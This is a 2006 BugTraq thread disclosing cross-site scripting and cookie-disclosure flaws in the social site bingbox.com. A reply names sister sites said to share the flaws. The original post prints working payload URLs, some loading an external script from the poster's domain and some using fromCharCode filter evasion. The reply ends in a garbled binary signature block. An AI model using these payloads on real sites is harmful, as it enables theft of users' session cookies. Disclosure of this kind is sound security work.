BugTraq
Bingbox.com - XSS & cookie disclosure Jun 16 2006 06:37AM
luny youfucktard com (1 replies)
Re: Bingbox.com - XSS & cookie disclosure Jun 17 2006 11:02AM
Sven Vetsch (sven vetsch disenchant ch)
Hi

Yes, there must be the XSS heaven :)

I contacted the INCROWD Interactive Media first time in March this year and
they always said, that they will patch it. Unfortunately they didn't do
anything until now and I didn't believe that they will do before someone do
a real nasty hack (using for DDoS for example).

There will be some similar products to bingbox.com which have all the same
vulnerabilities:
redbox.de
coolbox.be
coolbox.fr
coolbox.hu
obox.nl
xobox.de
xobox.at
xobox.ch
bingbox.co.uk
gentebox.es

So, we only can hope, that they will now patch it, else it seems to be their
end.

Greetings,
Disenchant

----- Original Message -----
From: <luny (at) youfucktard (dot) com [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>
Sent: Friday, June 16, 2006 8:37 AM
Subject: Bingbox.com - XSS & cookie disclosure

Bingbox.com

Homepage:
http://www.bingbox.com

Affected files:

* Profile input boxes:

- City input

* Registering

* Viewing Birthdays

* Adding a friend

* Viewing people online
-----------------------------------------------

XSS with cookie disclosure via inviting friends:
http://www.bingbox.com/go/admin/f=friends&o=invite&a=msn&t=web&wizard=st
art">">">">">'>'>'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>
<"<

"<"<'<'<'

XSS vuln with cookie disclosure via "City" input box on profile:

Data isnt properly sanatized before being generated. In one part of the site
its output as full code on the screen (tested using <img> tags, with <table>
tags, no

code displays), and on the other part, an XSS can occur:

For a PoC, since they add backslashes to ' and ", use the long UTF-8 Unicode
for ':

<TABLE BACKGROUND=javascript:alert('XSS')>

For the cookie:

<TABLE BACKGROUND=javascript:alert(document.cookie)>

--------------------------------------------------

XSS with cookie disclosure when viewing a blog, that redirects you to the
register page:

http://bingbox.com/go/register/wanted=luny666/">">">">">">'>'><SCRIPT%20
SRC=http://youfucktard.com/xss.js></SCRIPT><"<"<'<'<"<"

-----------------------------------------------

XSS via viewing birthdays:

http://www.bingbox.com/go/birthdays/month=8&day=13">'>'>'>"><"">">">"><I
MG%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<
"<""><

"<"

-------------------------------------------------

XSS when adding a new friend. Same as above, we arent able to use ' or long
UTF-8 unicode above, so we use fromCharCode's. PoC:

http://www.bingbox.com/go/admin/f=friends&o=new&friendname=DreamUnik">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))

><"<"<"<"<'<'<'<"<""><"<"

--------------------------------------------------

XSS vuln when viewing people online:

http://www.bingbox.com/go/whoisonline/i=1&agemin=&agemax=&country=US">'>
'>'>"><"">">">"><IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83
))

><"<"<"<"<'<'<'<"<""><"<"&locationarea=&sex=&page=3

------------------------------------------------

More XSS vulns:

http://www.bingbox.com/go/static/file=av">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=ps">'>'>'>"><"">">">"><IMG%20SRC=j
avascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"<""><
http://www.bingbox.com/go/static/file=gedragscode">'>'>'>"><"">">">"><IM
G%20SRC=javascript:alert(String.fromCharCode(88,83,83))><"<"<"<"<'<'<'<"
<""><

Screenshots:
http://www.youfucktard.com/xsp/bingbox1.jpg
http://www.youfucktard.com/xsp/bingbox2.jpg
http://www.youfucktard.com/xsp/bingbox3.jpg
http://www.youfucktard.com/xsp/bingbox4.jpg
http://www.youfucktard.com/xsp/bingbox5.jpg
http://www.youfucktard.com/xsp/bingbox6.jpg
http://www.youfucktard.com/xsp/bingbox7.jpg
http://www.youfucktard.com/xsp/bingbox8.jpg

__________ NOD32 1.1454 (20060321) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com

0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ?à0?h0?Ñ R 2?ÐØtÊD1(²Û?0
 *?H?÷
0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0
060111094433Z
070111094433Z0K10UThawte Freemail Member1(0& *?H?÷
 sven.vetsch (at) disenchant (dot) ch0 [email concealed]?0
 *?H?÷
0?¾æNÐäiL¹`Ir?uÐÆ"òY\Æ$±ú,bW³'C?°d?ùÓ+v±ÏXS?&íYª^Gò?ôÐæaÒ¤
?åsÇdSáâ?qã¹=/ê´Ã÷çôI}Yøw?§¶»ùt4®åÛ(Sû?3;:YNåÝ¼þϐ?&+;ÿX?V?rù
£6040$U0sven.vetsch (at) disenchant (dot) ch0 [email concealed] Uÿ00
 *?H?÷
??x%?k¸H?#ö±?ìS??i¹V.z«?î¼ÎXRÇv?×Õ ¤l w92g´¨]?-þ1ÀìÄ0JC?"Ý?
ç @·ìѼãuùE Ó¡§?KÔã_GA ?sF¿(ÿØ´_Ý,QÇ»¿Ë?Këô?(+ÍÑðiw«_?é0?-0?? 0
 *?H?÷
0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]
960101000000Z
201231235959Z0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]?0
 *?H?÷
0?Ôi×Ô°?d[qéGØ Q¶êr?°?^}-
{ß?%u(t:B,c'??{Kï~??ê£Ý¹Î?dÂnD¬|æèMq@8¦£?xöù??^­êÀ^vëÙ£]nz| ¥KU)??&Õj»8$j?DZڣ??ýyÛåZĹ£00Uÿ0ÿ0
 *?H?÷
Çì?~Nøõ?¥gb*¤ðM`Ðo`Xa¬&»R5\Ï0û¨J??bB#?ôºd?¬G)ߝ?^Òl`q\¢¬Üy
ãçnGµ
(èä?ýô¦Ù|±øÜ_#& ??sÐÞC©?%òæ?/Êþ¦«?u? ÝQ?käøÑÎw¢0??0?¨ 
0
 *?H?÷
0Ñ1 0 UZA10U Western Cape10U Cape Town10U
Thawte Consulting1(0&U Certification Services Division1$0"UThawte Personal Freemail CA1+0) *?H?÷
 personal-freemail (at) thawte (dot) com0 [email concealed]
030717000000Z
130716235959Z0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CA0?0
 *?H?÷
0?Ä¦<UsUûN¹Ê?ZhÀupßéÿ£ì½Íõ[òv½ :aò¿QÎÔåP
0×cZ,?p?ÝÉð+?Zª?qV˯< çñ?6$*Ï+Õó?w=¾+þ»>¿@?dק¦»?eÑÅ*T?H§¶Ñ<
a@dr`·û£?0?0Uÿ0ÿ0CU<0:08 6 4?2http://crl.tha
wte.com/ThawtePersonalFreemailCA.crl0 U0)U"0 ¤010UPrivateLabel2-1380
 *?H?÷
H?ÑP?ê .Ì
£f¬g¯¬¾Â¡C??L!¸ø6ª-?6/ÀôP ?p<ý­áabÃÙ:~?±?Å ?t?%P?bÇÛ'qW%Ý©?9?? Oe_?Ú÷÷?ÖÆN®öê4å[5MwãV!x?Ü!5Þ$±ÓFÿ]_eO1?Ù0?Õ0v0b1 0 UZA1%0#U
Thawte Consulting (Pty) Ltd.1,0*U#Thawte Personal Freemail Issuing CAR 2?ÐØtÊD1(²Û?0 + º0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
060617110243Z0# *?H?÷
 1
?ºc2d[&¶½¥²½4¶
?70[ *?H?÷
 1N0L0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0+0
 *?H?÷
?bØS?lZ-õp
#zÉÕ¶<i¡6~'ÄOáWéßB?O=ªnI?¹ºU?2xg ?ìä á³5Z??ðsûbEª k']¥ÙDØìîÎz¸ßßËr§Y(³e£?ò·?­=CÛÄ+§q0íÓø$ZnN[?ma®Gá_<å«?qÕ

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus